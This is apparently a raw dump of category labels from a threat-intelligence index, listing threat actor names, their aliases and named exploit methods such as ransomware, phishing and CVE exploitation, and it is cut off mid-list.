Kimsuky Kimsuky APT Kingsley Uchelue Utulu Known Ransomware Groups Laundry Bear Lazarus APT Lazarus Group Librarian Ghouls Liu Lizhi Lizard Squad Lizardsquad Local Attacker LockBit LockBit group LockBit ransomware gang LosPollos Lucky_Gh0$t ransomware group Lumma admins Lumma Stealer Lumma Stealer/LummaC2 Malicious employees in partner agencies Malicious Insider Malware Mamont Operators Matthew Akande Maxim Alexandrovich Rudometov Medusa ransomware affiliate Meta Midnight Blizzard Midnight Blizzard APT Mikhail Mikhailovich Tsaryov Mirai Mirai botnet Mirai botnet variant attackers Mirai botnets MirrorFace Moonstone Moonstone Sleet Mora_001 Muhamad Visat Nathan Laatsch Nathan Vilas Laatsch Nation-state actor Nation-State Actor Nation-state actors Nation-state attackers NCC Group Netlock New Russian espionage group Nigerian Involved in Hacking US Tax Preparation Firms NoName057(16) Nordic Resistance Movement (NRM) North Korea North Korea (DPRK)-linked threat actors North Korea's 'state-run syndicate' North Korean Government North Korean IT workers North Korean IT Workers North Korean state-sponsored actors NotPetya NotPetya group NPM Supply Chain Attack Actor NSO Group Nuclear Taurus Oilrig OilRig Operation Phantom Enigma Operation's affiliates Organized cyber criminals PHP Hooligans Play ransomware Play Ransomware Play ransomware group Play ransomware operators Pro-Russia hacktivists PumaBot Operators PureCoder PyPI supply chain attack actors Qilin Qilin group Raccoon RansomHouse RansomHub Ransomware actor Ransomware Actors Ransomware adversaries Ransomware gangs Ransomware groups Ransomware Groups Rare Werewolf Razing Ursa Red Menshen Red Team RedDragon Redfly group Redline RedLine REvil Rhysida Rhysida Ransomware Rhysida Ransomware gang RipperSec Robbinhood Ransomware Operators Rocke Rogue nation-state RootSc3pis Royal Russia Russia-linked APT Russia-linked APT actor Russia-nexus advanced persistent threat (APT) actor Russia-nexus advanced persistent threat (APT) group Russia-nexus APT actor Russian developers Russian hackers Russian state interests Russian state-sponsored hacking groups Russian-backed APT actor Russian-speaking cybercriminals Russian-speaking individual Russian-speaking threat actor Russians Salt Typhoon Salt Typhoon APT Samedit_MaraisakaBaronSamedit Sandworm Scammers Scanner ScarCruft Scarlet Goldfinch Scattered Spider SCATTERED SPIDER Security Service of Ukraine (SSU) Serbian Security Information Agency (BIA) Shengsheng He ShinyHunters ShroudedSnooper SideWinder APT Silent Ransom Silent Ransomware Group (SRG) Silent Werewolf SIM swappers Sina Gholinejad SolarWinds sophisticated nation state actor Sophisticated nation state actor Starchy Taurus Stargazer Goblin Stark Industries Solutions State-sponsored attackers State-sponsored groups StealC Storm-0408 Storm-1575 Storm-2035 Storm-2372 StormBamboo Stormous Strontium Sysdig-Observed-Actor TA450 TaskUs Employees (Coinbase Data Breach) Tavis Ormandy Telegram API Redirector The Com Threat actor behind RubyGems attacks Threat actor responsible for React Native Aria and rand-user-agent compromises Threat actors behind the phishing Threat Operator Triada Actors Trickbot Turla Turla APT UAC-0006 UAC-0063 Ukrainian National Unauthorized actor UNC3886 UNC3944 UNC4841 UNC5174 UNC5221 UNC6040 Underground Forum Exploit Sellers Unknown Unknown APT Actor Unknown Attacker(s) from Poland Unnamed credential stuffing actor Valentin Lobstein Variston Velvet Ant Velvet Chollima VexTrio Vidar Vile ViLE Vishing threat actors Vitaly Nikolaevich Kovalev Vladimir Viktorovich Kvitko Volt Typhoon WannaCry group Winnti Winter Vivern WormGPT WormGPT Creators xz-utils attackers Yandex Yicheng Zhang
Actor Aliases All @crypto-exploit @sw1zzx_dev @ThePureBot 764 Agonizing Serpens Alex Konor Ali888Z alinchok ALPHV AMOS (Atomic macOS Stealer) Anon Anonymous 64 anupm019@gmail.com anupm019@gmail[.]com AppleProcessHub Stealer APT-C-01 APT-C-08 APT-C-62 APT-C-64 APT-C-65 APT-C-67 APT-Q-37 APT10 APT15 APT29 APT34 APT43 APT44 APT5 AVCheck BADBOX Badbox 2.0 BADBOX 2.0 Barium BARIUM BeiDou ben Ben Bentley Bergen BianLian BidenCash BidenCash Administrators Bl00dy Black Owl BlackCat/AlphV BlackTech BloodyAD bloodzz.fenix Blue Athena BlueBravo BlueDelta Bronze Fleetwood Bronze Vapor Bùi nam buidanhnam Callisto Group Canary Typhoon cappership Charming Kitten Chatloader Chatty Spider Chinese government-linked hacking group Chinyong Chocapikk Circuit Panda CL-STA-0048 ClickFix Cloaked Ursa ColdRiver COLDRIVER APT Contagious Interview Convict Cozy Bear COZY BEAR CrackMapExec Crocodilus Crypt.guru Cryptor.biz CurveBack Cyber Army of Russia Cyber Army of Russia Reborn Cyber Av3ngers cyberbaddies Cybercriminals CyberLock CyberLock ransomware DadSec Daggerfly DarkMeta Deadglyph Deep Panda Defender dendimirror Desnake DevPopper Diamond Sleet DodgeBox DollyWay World Domination Campaign Earth Krahang Earth Lusca EDDIESTEALER Eleven11bot ePKI EUROPIUM Evasive Panda Facebook FakeUpdates Fancy Bear Fang Neng CDN Fighting Ursa FIN7 Flax Typhoon Flea FoxBlade FraudGPT FROZENLAKE Funnull Technology Inc. Gelsemium ghackihg Ghost Security GhostSecMafia Gleaming Pisces GRU Unit 29155 GSM h00die-gr3y Hazel Sandstorm Hazy Tiger Helgoland Bite HermeticWiper HEXANE Hexon Hidden Cobra HiPKI Hoody Hyena Hunters im_ad__213 INC Ransomware Instagram Iridium Iron Hemlock Iron Twilight ischhfd83 Ivan Neculiti Jinyong IT Cooperation Company Karake Katz Stealer KE3CHANG Keyhole Panda KEYHOLE PANDA Kill Security KillDisk Kim Jong Un Kim Sang Man Konni Konni APT Laundry Bear Laundy Bear Leet Librarian Ghouls Lifting Zmiy LILACSQUID Liu Lizhi LockBit Lucca Corgiat Lucky_Gh0$t Lumma Stealer LummaC2 Luna Moth Lyceum LZRD Mirai makc1901 Manganese Mango Media 2 Rise META Meta Pixel Midnight Blizzard MoonWalk Muck Muddling Meerkat navi_ghacking NEARMISS neon Neon Pothos NetExec Nickel Nobelium NodeSnake NoName057(16) North Korean technical workers Numero Nylon Typhoon Octo Tempest Odah Al-Suhaimat Odah Suhaimat odahodah Often9 OilRig Ominous Opal Sleet Operator Panda Orange Yali OSMIUM Palmerworm Pasker PathWiper Pawn Storm Pen Tester Phantom Circuit Phantom Mantis Phoenix Planedown Playboy ransomware Playcrypt Playful Dragon Playful Taurus Poison Vine Professor PulsePack PureCrypter PureLogs PureRAT PurpleHaze Python3127 PATH Hijack Qilin RapeFlake Rare Werewolf Rare Wolf Red Teamers Redfly group RedLine Infostealer REF0657 Resbot Resentual Rezet Rhysida Rhysida ransomware gang rKe3Chang Royal APT Russia-linked threat actor Ryan Ryan Cleary Salt Typhoon Sandworm Sandworm APT Sapphire Sleet ScarCruft Scattered Spider ScopeCreep Seashell Blizzard Secret Blizzard Sednit ShadowPad SharpSuccessor ShinyHunters Shrouded Crossbow si_mobile Sim Hyon Sop Simple DNS Rebinding Service Sina Ghaaf Singularity of Origin Sneer Review SocGholish Sofacy Spiderweb STAC6451 Star Blizzard StealthVector Stern Storm-0133 StripedFly Strontium SVR sw1zzx T-APT-17 TA397 TA422 TA450 Tabbywalk Target TeleBots The Com The Dukes The Manipulators THORIUM Threat actors ToddyCat APT TraderTraitor Travel Intelligence Program (TIP) Triad Nexus TrickBot Tumbleweed Typhoon Turla UAC-0006 UAC-0099 UAC-0125 Uchiha UchihaLS Uetus UNC1860 UNC2452 UNC2630 UNC3753 UNC3886 UNC3944 UNC4841 UNC5174 UNC5221 unheard44 Unknown Ursa Uteus VAGue Focus Veaty Viola Tricolor vision Vixen Panda VIXEN PANDA Volt Typhoon Voodoo Bear VOODOO BEAR Weep Whisper Wicked Panda Wicked Spider Winnti WinntiGroup Winter Vivern Wizard Spider WormGPT Yandex Browser Yandex Maps Yandex Metrica Yuri Neculiti Zeekill Zerolot ОДА СУХИМАТЬ
Exploit Method All ABAP_Vulnerabilities Abuse of Cloud Provider Infrastructure Abuse of Windows Defender Control to Disable Security Measures Abusing Client-Side Extensions (CSE) in Active Directory Abusing swap files in e-skimming attacks on Magento sites Abusing Ubuntu 'command-not-found' utility to install malicious packages Abusing Windows Container Isolation Framework to avoid detection by security products Accessibility Service Abuse for Cryptocurrency Seed Phrase Theft Accessibility Service Abuse in Android Account Compromise via Credential Theft/Phishing/Malware Account Farm for Creating Fake Accounts Account Recovery Phone Number Brute-Force Account Takeover Account Takeover (ATO) AcidRain Acreed Infostealer Active Exploitation of CVE-2025-5419 Active Exploitation of KEV Catalog Vulnerabilities Active Exploitation of Known Vulnerabilities Active Exploitation of Zyxel CPE Series Devices Zero-Day Admin Account Hijacking and Persistence Admin Security Failures Admin Takeover via 'Motors' Theme Vulnerability Adreno GPU Driver Memory Corruption Exploit Agentic AI Accelerated Ransomware Attack Simulation AI Agent Credential Harvesting AI Agents as Attack Vectors AI Alert Fatigue AI Cybersecurity Guideline Reduction AI Hallucination Leading to False Attack Signals AI Hallucination Leading to Introduction of Risk AI Hallucinations in SecOps AI Installer Malware AI Misinformation AI Model Collapse AI Model Manipulation by Authorized Users AI-Assisted Code Generation for Malicious Purposes AI-Assisted Insecure Code Deployment AI-Driven Windows and Office Automation AI-Enabled Phishing and Deepfakes AI-Generated Code Vulnerabilities AI-Generated Profile Photos AI-powered Phishing AI-Powered Phishing AI-Powered Phishing and Password Breaches AI-powered Phishing Scam via Deepfake Newscast AI-Powered Threats AI-Powered Vulnerability Discovery AirBorne flaws AiTM Phishing Kits (Evilginx) AMSI Bypass and Data Anomalies and Model Tricking in AI Anti-Satellite (ASAT) Weapons against Space-Based Interceptor System API Overload Application Freezing/Unresponsiveness Application-Layer Attacks with AI Auto-Remediation Application-Layer DDoS Attacks APT41 Google Calendar C2 Arbitrary Code Execution via Cargo Commands on Untrusted Projects Arbitrary Code Execution via Drive-By Compromise Arbitrary File Deletion via Junction Abuse Arbitrary File Upload and Remote Code Execution via Hardcoded JWT Arbitrary Intent Injection AsyncRAT Infection via Fake Booking.com Attackers are exploiting recently disclosed OttoKit WordPress plugin flaw Attackers chained Craft CMS zero-days attacks in the wild Attackers chaining Next.js flaw Authentication Bypass Authentication Bypass leading to RCE Authentication Bypass via Brute-force Authentication Bypass via machineAccountCheck AUTHENTICATION_BYPASS_THEN_RCE_INFO_DISC_FILE_DELETION AVTECH Camera Zero-day Exploitation Azimuth Security's iPhone unlock Azure OpenAI DNS Misconfiguration Leading to MitM and Data Leak Backdoor in Contec CMS8000 / Epsimed MN-120 Backdoor Injection via Fake Security Tool Plugin Backdoor Installation and Persistence Backdoor Installation in NVRAM Backdoored Game Cheats Backdoored GitHub Repositories Backdoored Malware Deployment Backdoored Open Source Malware Repositories Backdoored pirated applications targeting Apple macOS users Backdoors BadBox 2 Botnet BADBOX 2.0 Badbox 2.0 Botnet BADBOX 2.0 Botnet Badbox 2.0 Botnet Infection BADBOX 2.0 Malware as Residential Proxy BadSuccessor Exploitation via dMSA Abuse Bagle worm Bankurt Trojan Remote Control Bitcoin Mixing BitLocker Recovery Loop BitM Attack using Fullscreen API (Safari) Black Basta and Bl00dy ransomware group exploitation of CVE-2024-1709 and CVE-2024-1708 BLASTPASS BLE Authentication Bypass via Uninitialized Variable Block Windows Updates via Junction Point Bogus NFT Airdrops on Hashgraph Booking.com Reservation Abuse BPFDoor Backdoor Breaking into opponent's computer systems bring your own installer (BYOI) Broken Authentication in APIs Broken SIEM Rules Broken Windows Update Leading to Recovery Mode Brute-Force Attack on Google Account Recovery Brute-force attack on weak passwords Brute-Force Login and Authentication Bypass Brute-Force Login Attack Buffer Overflow Buggy Security Update Leading to System Crashes Bulk Purchase of IP Addresses Business Logic Attacks (BOLA) BYO ISO Persistence BYOVD Bypassing Android 13 Accessibility Restrictions with Session-Based Package Installers Bypassing User Account Control (UAC) Cashing out in small distributed quantities Cellebrite Exploitation Censorship of Information Certificate Abuse Certificate Trust Revocation Chained Weaknesses Exploit Chaining Vulnerabilities for Lateral Movement and Pivoting Chaos Ransomware Attack Chaos RAT ChatGPT_o3_shutdown_bypass China-linked APT Salt Typhoon compromised US broadband providers and breached wiretap systems China-linked APT uses Cisco Router Flaws ChoiceJacking Chrome Sandbox Escape via Malicious File (CVE-2025-2783) Circumvention of Age Verification via Alternative Sources Cisco Smart Licensing Utility flaws exploited in the wild CitrixBleed Exploit ClickFix ClickFix Attacks ClickFix Social Engineering Clipboard Hijacking and PowerShell Command Execution Clipboard Poisoning Cloud Misconfiguration Cloud Misconfigurations and Insecure APIs Cloud Permission Mismanagement / Least Privilege Violation CloudTrail Logging Evasion via IAM Policy Size Differences Cobalt Strike Penetration Testing Tool Code Injection via Gecko Bootloader Firmware Update Codebase Destruction via Malicious npm Package COM Object Instantiation for Arbitrary Code Execution Command Chaining via Macro Pads Command Injection via POST Data Compromised Accounts for Cryptocurrency Mining Compromised AWS Credentials via Misconfigured S3 Bucket Compromised Booking System Compromised Container Leading to Crypto Mining via Docker CLI Installation Compromised Credential Exploitation Compromised Credentials via Phishing Compromised Credentials via Third-Party Contractors Compromised Credit Card Data Sales Compromised Dependencies Compromised Dormant Business Accounts Compromised Email Account Setup and Usage Compromised Endpoint Administration Framework Compromised Google Play Developer Accounts Compromised Identity Systems Exploit Compromised Login Credentials (SSH) Compromised Microsoft Exchange Webmail Account Exploit Compromised ScreenConnect instances Compromised Snowflake Credentials leading to Data Exfiltration Compromising Video Surveillance Devices Compulsory Legal Process Compromise Concurrency Bugs/Memory Leaks Consul Health Check Abuse Consul Misconfiguration Exploitation Consul Remote Code Execution via Malicious Checks Contact List Manipulation for Social Engineering Conti Ransomware Deployment Cookie Theft for Account Access Coordinated Phishing using Generative AI Copyright Infringement via Content Reproduction Corporate Espionage/Infiltration Courthouse Raids Exploiting Policy Changes Covert Channel Tunneling via Azure Blob Storage (ProxyBlob) CPS Targeting Craft CMS zero-day chaining Crafted HTML Page for Heap Corruption crafted_packets_dos_and_information_leak Credential Dumping Credential Dumping via Mimikatz Credential Harvesting Credential Harvesting via Fake WordPress Caching Plugin Credential Harvesting via Malicious PyPI Package Credential Harvesting via Phishing Credential Leaks in Public GitHub Repositories Credential Stuffing Credential Stuffing (23andMe Breach) Credential Stuffing Attack Credential Stuffing/Password Cracking Credential Stuffing/Phishing leading to Fraudulent Claims Credential Stuffing/Unauthorized Access Credential Theft (Valid Accounts / No MFA) Credential Theft (via Social Engineering) Credential Theft and Abuse Credential Theft and Known Flaw Exploitation (Play Ransomware) Credential Theft and Unauthorized Access Credential Theft via Spear Phishing Using CVE-2024-42009 Credential Theft via Trojan Stealers Crocodilus Android Banking Trojan Crontab Persistence Cross-domain attacks Cross-Platform System Deletion via Backdoor (system-health-sync-api) Cross-Site Data Collection CrushFTP CVE-2025-2825 flaw actively exploited Crypto Malware (Wallet Draining) Crypto Theft Cryptocurrency Laundering Cryptocurrency Money Laundering Cryptocurrency Wallet Draining via Malicious npm Packages Cryptojacking via Breached Hosting Accounts Custom CSE Backdoor via GPO Manipulation CVE-2025-49113 Exploit Cyber Attacks on Military Networks Cyber Toufan Weak Credentials Cyberattack leading to system shutdown and operational disruption CyberLock Ransomware Data Breach and Repackaging Data Breach Leading to Account Takeovers and Identity Theft Data Breach via Third-Party SAP Service Provider Data Breach via Unauthorized System Access Data Broker Surveillance Data Decryption Data Exfiltration Data Exfiltration and Website Defacement Data Exfiltration Using Living Off The Land (LOTL) Data Exfiltration via Cookie Theft Data Exfiltration via Copy-Pasting into Chat/AI Data exfiltration via encrypted channels Data Exfiltration via Malicious Browser Extensions Data Exfiltration via PowerShell Script with 7-Zip Archiving Data Exfiltration via Typosquatting Packages Data Exfiltration via Unapproved SaaS Applications Data Exposure due to Multi-Tenancy Data Leak from TrickBot and Conti Data Leakage Data Loss Prevention (DLP) Evasion Data Poisoning Data Privacy Violations by Cloud-Served LLMs Data Re-identification in Synthetic Data Data Theft via Bribed Insiders (Coinbase Breach) DCM File Parsing Out-Of-Bounds Write Remote Code Execution DDoS Attack DDoS via Botnets Deepfake Creation and Distribution Deepfake Enabled Phishing Deepfake Scams using Generative AI Deepfake Voice Phishing Deepfake-enabled Social Engineering Deepfakes Default Enabled Screen Recording in T-Life App Dependency Confusion Device Code Phishing Digital Identity Theft Directory Traversal Arbitrary File Deletion Dirty Pagetable Technique Disabling or jamming remote equipment (like drones) Disgruntled Employee Insider Threat Distribution via Bogus Facebook Ads DLL side-loading DLL Side-loading with PULSEPACK DLL Sideloading DLL Unhooking dMSA Privilege Escalation DNS Hijacking DNS Poisoning/Cache Poisoning DNS Rebinding DNS Spoofing/Abuse DNS Tunneling Exploit DNS-Based Attacks Docker API Misconfiguration Docker Engine API Misconfiguration Exploitation doExecute Command Injection Domain Controller Hijacking via VMDK Mounting Domain Generation Algorithm (DGA) Abuse Domain Generation Algorithm (DGA) and Infrastructure Laundering Dormant Account Exploitation Dormant User Accounts Double Extortion DragonForce Ransomware DragonForce Ransomware via SimpleHelp RMM Earth Lamia SAP NetWeaver Exploitation EDDIESTEALER EDDIESTEALER's Bypass of Chromium's App-Bound Encryption Endpoint Administration Framework Abuse for Malware Deployment Entitlement Fraud via Digital Identities Entitlement Fraud via Digital IDs Evilginx Phishing Framework EvilProxy Campaign Excessive Agency Exploit of unix_chkpwd process Exploitation of Complex Network Segmentation Exploitation of Edge Device Vulnerabilities Exploitation of Familiar Templates/Knowledge Exploitation of Insider Risk During Employee Offboarding Exploitation of Internet-Facing Applications (BladedFeline) Exploitation of Legacy Vulnerabilities in OT Systems Exploitation of Old/Reused Credentials Exploitation of Public-Facing Application for Initial Access Exploitation of unpatched software and old applications Exploitation via Publicly Accessible Groups Exploiting Misconfigurations Exploiting outdated software exposed services Exposed Vulnerabilities due to Failing Defenses Exposure of Management Interfaces Facial Recognition Bans Factory Reset Exploit Fake AI Installer Malware Distribution Fake CAPTCHA to Evade Static Scanners Fake Zoom Client Downloader Leading to Remote Access Fast-Flux Hosting File Integrity Monitoring Bypass FinalDraft Backdoor Firebase and Google Apps Script Hosting of Phishing Pages Flog Web Shell Deployment Fortinet Authentication Bypass and Remote Code Execution Fortinet FortiVoice Zero-Day Exploit Fraud rings exploiting insecure services Fraudulent Contract Manipulation by Partner Agencies Fraudulent Identity and Due Diligence Bypass Fraudulent Tax Return Filing Funnull Infrastructure Abuse Funnull Technology Inc. Infrastructure Abuse Funnull Technology IP Address Abuse Gaining Valid Credentials via Inadequate Password Policies Generative AI Assisted Phishing/Scam Operations Generic Weakness Exploitation getServerCertificate Command Injection getServerPayload Directory Traversal GhostSpy Gitea Remote Code Execution via Git Hooks/Install Lock Gitea Unlocked Installer Exploitation Gladinet flaw actively exploited Glitch Platform Abuse for Phishing Google Account Phone Number Brute-Force Google Account Phone Number Brute-Forcing via Legacy Username Recovery Form Google Calendar C2 Google Calendar Command and Control Google Calendar Exploit by APT41 GOREshell Backdoor GOREshell Backdoor Deployment via Zero-Day Exploits GPS Jamming GPS Spoofing GPT-4 Exploit Generation GUID Hijacking Hands-on-Keyboard Activity Haozi Phishing-as-a-Service Hard-coded API Keys and Secrets Hardcoded API Keys and Secrets Hardcoded Credentials and Backdoor for System Wipe Hashtag Manipulation for Increased Visibility Heap_Corruption_via_crafted_HTML_page_CVE-2025-5419 Heap-based Buffer Overflow in tuya_svc_devos_activate_result_parse Hedera Hashgraph NFT Airdrop Scam Help Desk Scams HermeticWiper Hexon/Leet Stealer Malware Distribution High-Volume Hijacking of SolarView Compact devices for bank account theft Hook Android Banking Trojan Source Code Leak HPE StoreOnce Remote Code Execution via Chained Vulnerabilities HTML Conditional Statement Abuse for Phishing HTTP Header Manipulation Hugging Face Spaces Abuse Human Error ICO_File_Parsing_Integer_Overflow_RCE Identity and Access Management (IAM) Attack Surface Identity-based attacks Identity-Based Exposure Identity-Centric Attacks by Nation-States iDRAC Vulnerability IIS Folder Exploit IMEI Blacklist Circumvention/Exploitation iMessage Nickname Update Zero-Click Exploit iMessage Zero-Click Attacks Suspected in Targeting of High-Value Individuals Impacket abuse Improper Redaction of Personally Identifiable Information in Anonymous Email Inconsistent Threat Group Naming Incorrect Folder Permissions Privilege Escalation Indirect Phrasing Evasion Information Stealing via Malicious AI SDK Packages Information-stealing malware Initial Access via Legitimate Endpoint Administration Tool Insecure Code Generation by AI Coding Tools Insecure Communication of Sensitive Defense Information Insecure Mobile Access (Public Wi-Fi) Insider Access Exploitation (ViLE Group) Insider Threat Exploit Insider Threat Exploitation Interlock Ransomware Interlock Ransomware Attack Interlock Ransomware Double Extortion iOS and Android Jailbreaking/Exploitation using Corellium Virtualization IoT Security Downgrade IP Address Hijacking for Malicious Proxy Services iPhone Zero-Click Exploit IPhone Zero-Click iMessage Exploit Ivanti Cloud Vulnerability Chain (CVE-2024-8963 & CVE-2024-8190) Ivanti EPMM Authentication Bypass for Expression Language Remote Code Execution Ivanti EPMM flaws exploited by UNC5221 Juice Jacking Katz Stealer Katz Stealer's Circumvention of Chrome's App-Bound Encryption Kinetic Projectile Weapon Misuse Known Vulnerability Exploitation KNOWN_EXPLOIT_USE Kubernetes API Brute-Force and API Vulnerability Exploitation Lack of 2-Step Verification (2FA) Lack of Data Governance in AI Systems Lack of Effective Age Verification Lack of Explainability and Auditing in AI Tools Lack of Formalized Incident Response Plan Lack of Security Awareness Among Developers Lack of SMB Cyber-Resilience Lateral Movement Lateral Movement and Data Exfiltration via Over-Permissioned NHIs Lateral Movement via Compromised App-to-App Connections LD_PRELOAD hijacking Least Privilege Violation Legacy Driver Abuse (Check Point Research) Legitimate Tool Abuse Leveraging Leaked Ransomware Builders (LockBit 3.0) Leveraging Legitimate Software for Malicious Purposes License Plate Reader Surveillance Lithium-ion Battery Thermal Runaway Living Off The Land (LOTL) Data Exfiltration Living off the Land with ScreenConnect LLM Jailbreaking LNK_File_Exploit Local Storage via microSD Card Localhost Port Eavesdropping for Data Linking Log Manipulation Logic Bombs Lookalike Domain Loss of CCTV Footage LOTS/LOLBins Exploitation (Calendarwalk) Low-Complexity Task Exploitation Lucky_Gh0$t Ransomware Lumma Infostealer Distribution Lumma Infostealer Persistence Lumma Stealer (LummaC2) Lumma Stealer Distribution Tactics macOS Shell Script Execution Malicious AI Code and Libraries from Prompt Injections Malicious App Distribution (Unofficial Marketplaces) Malicious Applications and Firmware Updates Malicious Apps on Google Play Malicious Browser Extension Installation via Policy Modification Malicious Browser Extensions Malicious Cables Malicious Code Generation via AI Prompting Malicious Code in Test Code Malicious Code Injection into Developer Code Repository Malicious Code Injection/Modification Malicious Domain Spoofing Malicious Driver Exploitation Malicious Go Modules Malicious Insider Attack Malicious JavaScript Injection (Polyfill Scandal) Malicious NPM Packages Disguised as Express Utilities Allow Attackers to Wipe Systems Malicious Package Injection into Open-Source Repositories Malicious Payload in Updates Malicious Repository Distribution Malicious Salesforce Connected App (Modified Data Loader) Malicious Web Traffic Analysis and Replay Malware Bundling/Trojan Horse Malware Delivery via Fake AI Video Generators Malware Evasion using AVCheck and Crypting Services Malware Evasion via Counter Antivirus Services Malware Exploitation via API Mimicry Malware Generation via AI Tools Malware Obfuscation and Evasion using Crypting Services Malware-Enabled Cookie Theft Malware-free intrusions Malware-free Intrusions Man-in-the-Middle (MITM) via Unencrypted Password Sharing Man-in-the-Middle Attack Management Card Authentication Bypass Mass exploitation campaign Material Support for Terrorism MCU Command Parsing Misinterpretation Medusa Medusa ransomware and ABYSSWORKER Meta Pixel SDP Munging MFA Bypass via Social Engineering MFA Fatigue (Push Bombing) Microsoft Teams attack via Black Basta Microsoft Windows NTLM flaws Mirai Botnet Mirai Botnet Exploit of Wazuh CVE-2025-24016 Mirai Botnet Infection via Shell Script Mirai Botnet Variant Mirai Botnets Exploiting Wazuh Security Platform Vulnerability Mis-issued certificates leading to bypass warnings Misconfiguration Exploitation Misconfigurations Misconfigured AWS Landing Zone Misconfigured Docker Engine API Misinformation and Amplification of Conspiracy Theories Misuse of Sanctions against Political Opponents MitM Attack via Insufficient SSH Host Key Validation (CVE-2025-20163) MITRE ATT&CK Coverage Gaps Mnemonic Phrase Harvesting via Fake Crypto Wallet Apps Mobile Device Exploitation via Cellebrite UFED Modified Salesforce Data Loader Morphing Meerkat Multi-Vector DDoS Attacks with Systematic Probing and Adaptive Tactics Multiple Palo Alto Networks firewalls hacked Nation-State Hacking Campaigns NetBird Deployment via Multi-Stage Phishing Network Device Exploitation (Check Point, Fortinet, SonicWall, CrushFTP) Network Flooding Network Intrusion Leading to System Shutdown Network/System Intrusion and Data Exfiltration New AyySSHush botnet using ASUS routers New ReaderUpdate malware variants target macOS users NFC Relay Attack using NFCGate NICKNAME Nimbo-C2 Remote Access Framework NodeSnake RAT NodeSnake RAT Deployment Nomad Insecure Server Exploitation Nomad Job Queue Abuse Nomad Misconfiguration Exploitation North Korean Fake IT Worker Scheme NotPetya Malware NotPetya Ransomware NoviSpy Deployment via Cellebrite NPM Supply Chain Attack via Package Compromise NtManageHotPatch API Patching for Process Hollowing Numero Malware OAuth Permission Abuse by Generative AI Applications Open WebUI Misconfiguration - Arbitrary Command Execution OpenAI O3 Shutdown Subversion Operation on the Clear Web or open ports OttoKit WordPress Plugin Admin Account Injection Out-of-bounds Read and Write in V8 JavaScript Engine Over-Privileged NHIs Overlay Attacks to Harvest Credentials Overwhelming Missile Attack (Arms Race Escalation) Overwriting Configuration File and Triggering Service Restart OWASP Top 10 API Threats Password Database Theft (1Password Example) Password Reuse Password Stuffing Attack Patch Tuesday Path Traversal Path Traversal via Web Honeypot URL PathWiper PathWiper Data Destruction PathWiper Deployment via Compromised Endpoint Administration Framework PayDay Loader PayU CommercePro Account Hijacking Peachpit Ad Fraud Module Phishing Phishing and Social Engineering Phishing and Social Engineering (Pig Butchering) Phishing Attacks Phishing Automation Phishing Campaign Leading to Remote Access Software Deployment Phishing Campaign to Deliver Malicious Archives Phishing Code Smuggling in SVG Images Phishing Distribution of Chaos RAT Phishing Emails Phishing for Gaming and Streaming Accounts Phishing for Initial Access Phishing Simulations and Social Engineering Attacks Phishing via Compromised Booking Platform Messaging Phishing Vulnerability Phishing with LNK files Phishing/Social Engineering Phone Call Impersonation PHP Object Deserialization Leading to RCE via CVE-2025-49113 PHP Object Deserialization via _from parameter PHP Reflection Method Access Pig Butchering Scam Pig Butchering/Romance Baiting PIN Code Exfiltration via Content Provider Plaintext Transmission of Sensitive Data via HTTP Play Ransomware Play Ransomware Double Extortion Play ransomware zero-day exploitation Plugin Abuse Plugin/Theme Vulnerability Exploitation for Redirects PNG Data After IEND PNG File Appending Port Knocking and Magic Bytes in SSH Traffic Post-Quantum Cryptography (PQC) cracking current cryptographic algorithms PowerShell One-Liner Download PowerShell Script Execution via Social Engineering PreBuild Event Backdoor Preloaded Malware PrimeCache IIS Module Backdoor PrimeCache Malicious IIS Module Privacy Breach via Data Retention Privilege escalation Privilege Escalation Privilege Escalation via Forgotten Admin Access Privilege_Escalation_and_Backdoor_Installation Privileged Account Abuse Privileged Container Exploitation Process Hollowing Process Injection processAttachmentDataStream Directory Traversal Remote Code Execution Prompt Engineering Attacks on Agentic AI Prompt Injection Prompt Injection and Manipulation ProxyBlob - Reverse SOCKS5 Proxy via Azure Blob Storage ProxyLogon ProxyShell Psychological Manipulation via Phone Calls PulsePack Backdoor Pwn2Own demonstrated exploits Python RAT Execution Qilin Ransomware Deployment via FortiGate Vulnerabilities Quantum Computing Breaking Traditional Encryption queryHardwareReportLocally Command Injection Ransomware Ransomware Attack Ransomware Attack and Data Exfiltration Ransomware Attack by Interlock Ransomware Attacks Ransomware Double and Hybrid Extortion Ransomware Groups Leveraging Unfulfilled SEC Disclosure Requirements Ransomware-as-a-Service (Playboy Ransomware) Ransomware-as-a-Service (RaaS) Affiliation Ransomware-as-a-Service (RaaS) model adoption React Native Aria Packages Backdoored in Supply Chain Attack Recompiled Ransomware Binaries RedLine Information Stealer Malware RedLine Infostealer Malware RedLine Stealer Reduced Attack Surface Registry Key Dumping to Steal Credentials Remote Access Trojan (RAT) Functionality Remote Access Trojans (RATs) Deployment Remote Code Execution via Crafted Software Image Upload Remote Code Execution via Require() Remote Data Wipe via Hidden Endpoint (express-api-sync) Remote Data Wipe via Multiple Endpoints (system-health-sync-api) Remote Desktop Freeze Exploit Remote Fire Panel Control via Default Account Remote Fire Panel Control via Hardcoded VNC Password Replay Attack Bypassing Deepfake Detection Residential Proxy Abuse Reverse Engineering RFA_File_Parsing_Use_After_Free RFID skimming Right-to-Left Override (RLO) Filename Spoofing RoamingMOUSE Anel Backdoor Robbinhood Ransomware Attack Rogue devices in Chinese-made power inverters Rogue VM Creation Role Playing Evasion RolesAnywhere_Default_Configuration_Exploit RolesAnywhere_Privilege_Escalation Romano's PoC Exploit Romano's vBulletin Exploit Root Privilege Escalation Roundcube RCE via PHP Object Deserialization Row Level Security (RLS) Policy Misalignment in "Vibe Coded" Apps Rules File Backdoor Rules File Backdoor: AI Code Editors exploited for silent supply chain attack Sakura RAT Sakura RAT Backdoor Salesforce Connect Setup Page Code Injection via Social Engineering Salesforce Data Exfiltration via Malicious Data Loader Salesforce Data Theft via Fake IT Support Calls Salt Typhoon Salt Typhoon attacks on US telcos Salt Typhoon breach of telecommunications companies Sandworm Cyberattack on Ukrainian Power Grid SAP NetWeaver flaw exploitation SBA Economic Injury Disaster Loan Fraud Scams targeting young gamers through in-game offers Scattered Spider Attacks Scheduled Task Abuse for Persistence and Covert Operations Scheduled Task Abuse for Remote Access ScopeCreep Malware Development ScreenConnect_PLC_Hijack Search Hijacking Secret Leakage SELinux Bypass SEO Poisoning SEO Poisoning leading to Malware Deployment Server-Side Request Forgery (SSRF) via determineInclusionAndExtract method Service Desk Number Spoofing setLocateBeaconOnHardware Command Injection Setting AnyDesk Password for Unattended Access Sextortion Scams Shadow AI Applications Shadow AI Data Leakage Shadow IT Shadow IT Exploitation ShadowPad Backdoor Deployment ShadowPad Malware ShadowPad Malware Delivery via 